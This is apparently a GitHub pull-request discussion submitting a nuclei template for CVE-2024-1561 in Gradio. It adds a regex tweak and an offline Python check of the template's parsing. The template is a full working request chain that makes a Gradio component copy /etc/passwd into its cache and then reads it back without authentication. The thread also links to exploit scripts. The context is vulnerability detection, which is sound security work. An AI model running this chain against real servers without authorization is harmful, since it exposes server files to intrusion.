Closed DiabloHTB closed 4 months ago
Check here for usage and output https://github.com/DiabloHTB/Nuclei-Template-CVE-2024-1561/tree/main
@DhiyaneshGeek I have an improvement to this for the regex part before this gets added, and to use that as a variable instead of just the hash, making this applicable even if they don't have the gradio folder: `/tmp/anything/hash/passwd` instead of just `/tmp/gradio/hash/passwd`.
```yaml
id: CVE-2024-1561

info:
  name: CVE-2024-1561
  author: Diablo
  description: |
    Local file read by calling arbitrary methods of Components class
  severity: high
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read files on the server
  remediation: |
    Update to Gradio 4.13.0
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  reference:
    - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
    - https://github.com/DiabloHTB/CVE-2024-1561
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1561
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1561
  metadata:
    # the chain below sends three requests (/config, /component_server, /file=)
    max-request: 3
    vendor: Gradio
    product: https://github.com/gradio-app/gradio
  tags: cve,cve2024,intrusive,unauth,gradio,path-traversal

http:
  # 1. Fetch the app config and take the id of the first component
  - raw:
      - |
        GET /config HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: first-component
        part: body
        json:
          - '.components[0].id'
        internal: true

  # 2. Ask that component to copy /etc/passwd into Gradio's temp cache; the
  #    response body is the cache path as a JSON string, e.g. "/tmp/gradio/<hash>/passwd"
  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{first-component}}",
         "data": "/etc/passwd",
         "fn_name": "move_resource_to_block_cache",
         "session_hash": "aaaaaaaaaaa"}

    extractors:
      - type: regex
        name: tmpath
        # capture the whole path, so the cache need not live under /tmp/gradio
        regex:
          - '\/[a-zA-Z0-9\/]+'
        internal: true

  # 3. Read the cached copy back through the /file= endpoint
  - raw:
      - |
        GET /file={{tmpath}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0:"
```
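To check the regex change discussed above without a live Gradio instance, here is an added Python example. It is my code, not the PR author's template and not part of Gradio or nuclei-templates: it runs the template's three parsing steps (json extractor on /config, regex extractor on the /component_server reply, matcher on the /file= body) over constructed sample responses, and compares the updated whole-path regex with a hash-only extraction that I reconstruct as `HASH_ONLY_RE` (an assumption about the earlier template, not its actual text). The component ids, hash and response bodies are made up.

```python
"""Added example: offline check of the three parsing steps in the CVE-2024-1561
nuclei template above. Not the PR author's code and not part of Gradio or
nuclei-templates; every sample response below is constructed."""
import json
import re

# Regex from the updated template: capture the whole cache path.
FULL_PATH_RE = re.compile(r"/[a-zA-Z0-9/]+")
# Hypothetical reconstruction of the earlier approach, which pulled out only
# the hash and rebuilt the path as /tmp/gradio/<hash>/passwd.
HASH_ONLY_RE = re.compile(r"/tmp/gradio/([a-zA-Z0-9]+)/passwd")
# Matcher from the template's final request.
PASSWD_RE = re.compile(r"root:[x*]:0:0:")


def first_component_id(config_body: str) -> int:
    """Step 1: the json extractor '.components[0].id' over GET /config."""
    return json.loads(config_body)["components"][0]["id"]


def component_server_payload(component_id, data="/etc/passwd",
                             session_hash="aaaaaaaaaaa") -> dict:
    """Step 2 request body, as the template sends it to POST /component_server."""
    return {
        "component_id": str(component_id),
        "data": data,
        "fn_name": "move_resource_to_block_cache",
        "session_hash": session_hash,
    }


def extract_tmp_path(component_server_body: str):
    """Step 2 extractor (updated template): first whole path in the reply, or None."""
    m = FULL_PATH_RE.search(component_server_body)
    return m.group(0) if m else None


def extract_hash_only(component_server_body: str):
    """Earlier approach (hypothetical reconstruction): only works under /tmp/gradio."""
    m = HASH_ONLY_RE.search(component_server_body)
    return m.group(1) if m else None


def file_request_line(tmp_path: str) -> str:
    """Step 3 request line built from the extracted path."""
    return f"GET /file={tmp_path} HTTP/1.1"


def looks_like_passwd(body: str) -> bool:
    """Step 3 matcher: a root entry with 'x' or '*' in the password field."""
    return PASSWD_RE.search(body) is not None


# --- constructed sample responses (not captured from a real instance) ---
CONFIG_BODY = json.dumps({"version": "4.12.0",
                          "components": [{"id": 3, "type": "textbox"},
                                         {"id": 5, "type": "button"}]})
HASH = "3f9a0c2b7d1e4a5f6b8c9d0e1f2a3b4c"
DEFAULT_CACHE_BODY = json.dumps(f"/tmp/gradio/{HASH}/passwd")        # stock cache dir
CUSTOM_CACHE_BODY = json.dumps(f"/tmp/anything/{HASH}/passwd")       # cache moved elsewhere
UNDERSCORE_CACHE_BODY = json.dumps(f"/var/tmp/gradio_cache/{HASH}/passwd")
PASSWD_BODY = ("root:x:0:0:root:/root:/bin/bash\n"
               "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n")


def run_chain(config_body, component_server_body, file_body):
    """Drive the three steps over given bodies; returns (request line, matched?)."""
    cid = first_component_id(config_body)
    payload = component_server_payload(cid)
    assert payload["fn_name"] == "move_resource_to_block_cache"
    path = extract_tmp_path(component_server_body)
    if path is None:
        return None, False
    return file_request_line(path), looks_like_passwd(file_body)


if __name__ == "__main__":
    for label, body in [("default", DEFAULT_CACHE_BODY),
                        ("custom", CUSTOM_CACHE_BODY),
                        ("underscore", UNDERSCORE_CACHE_BODY)]:
        print(label, "full-path:", extract_tmp_path(body),
              "hash-only:", extract_hash_only(body))
    print(run_chain(CONFIG_BODY, CUSTOM_CACHE_BODY, PASSWD_BODY))
```

The `custom` case is the one the thread is about: the hash-only reconstruction returns nothing when the cache is not under `/tmp/gradio`, while the whole-path regex still yields a usable `/file=` request. The `underscore` case shows the limit of the template's character class: `[a-zA-Z0-9/]` stops at `_` (and `-`), so a cache directory containing those characters would be truncated to `/var/tmp/gradio` and the third request would miss.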
Hi @DiabloHTB, only this part below was updated, right?

```yaml
    extractors:
      - type: regex
        name: tmpath
        regex:
          - '\/[a-zA-Z0-9\/]+'
        internal: true
```
@DhiyaneshGeek Hey there, that part and the last request changed from `GET /file=/tmp/gradio{{tmpath}}passwd HTTP/1.1` to `GET /file={{tmpath}} HTTP/1.1`, since I now have the full path, not just the hash. Below is the full signed template; let me know if I need to add something, this is my first template.
```yaml
id: CVE-2024-1561

info:
  name: CVE-2024-1561
  author: Diablo
  description: |
    Local file read by calling arbitrary methods of Components class
  severity: high
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read files on the server
  remediation: |
    Update to Gradio 4.13.0
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  reference:
    - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
    - https://github.com/DiabloHTB/CVE-2024-1561
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1561
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1561
  metadata:
    # the chain below sends three requests (/config, /component_server, /file=)
    max-request: 3
    vendor: Gradio
    product: https://github.com/gradio-app/gradio
  tags: cve,cve2024,intrusive,unauth,gradio,path-traversal

http:
  # 1. Fetch the app config and take the id of the first component
  - raw:
      - |
        GET /config HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: first-component
        part: body
        json:
          - '.components[0].id'
        internal: true

  # 2. Ask that component to copy /etc/passwd into Gradio's temp cache; the
  #    response body is the cache path as a JSON string, e.g. "/tmp/gradio/<hash>/passwd"
  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{first-component}}",
         "data": "/etc/passwd",
         "fn_name": "move_resource_to_block_cache",
         "session_hash": "aaaaaaaaaaa"}

    extractors:
      - type: regex
        name: tmpath
        # capture the whole path, so the cache need not live under /tmp/gradio
        regex:
          - '\/[a-zA-Z0-9\/]+'
        internal: true

  # 3. Read the cached copy back through the /file= endpoint
  - raw:
      - |
        GET /file={{tmpath}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0:"
# digest: 490a0046304402203c6137fea5301e4c6d68e46f20ce0a6c5a88919d747eecf8b4f4df9773d84845022031b061bfbc332f22390d9ea69831e2f94586cc49fd8a1b1419dd39c2a8dda8d1:9c69f0f6a1e1d9ed8dd8d3f14441892c
```
Hi @DiabloHTB, I'll update the PR #9800 from my side.
You can grab your cool PD stickers over here http://nux.gg/stickers 😄
Thanks for sharing the updated template
Template Information:
Local file read by calling arbitrary methods of Components class in Gradio 4.12.0. The template I created detects this by trying to get the /etc/passwd and matching with the word root, using three requests:
1. /config: extracting the id of the first component.
2. /component_server: using the previously extracted id to get the temporary path of the /etc/passwd. The response is in double quotes, so I use a regex to extract the hash inside it and use it in the next request. -------NOTE------ This step can be improved by extracting the whole path without double quotes using regex, I couldn't find a way to do this.
3. tmpath: to get the /etc/passwd using the already extracted hash, example "/tmp/gradio/{{tmpath}}passwd", and match with the word "root:[x*]:0:0:".
Gradio: https://github.com/gradio-app/gradio
Full writeup and Python script to exploit: https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
Sh PoC was created by me: https://github.com/DiabloHTB/CVE-2024-1561
Nuclei Template:
Example output: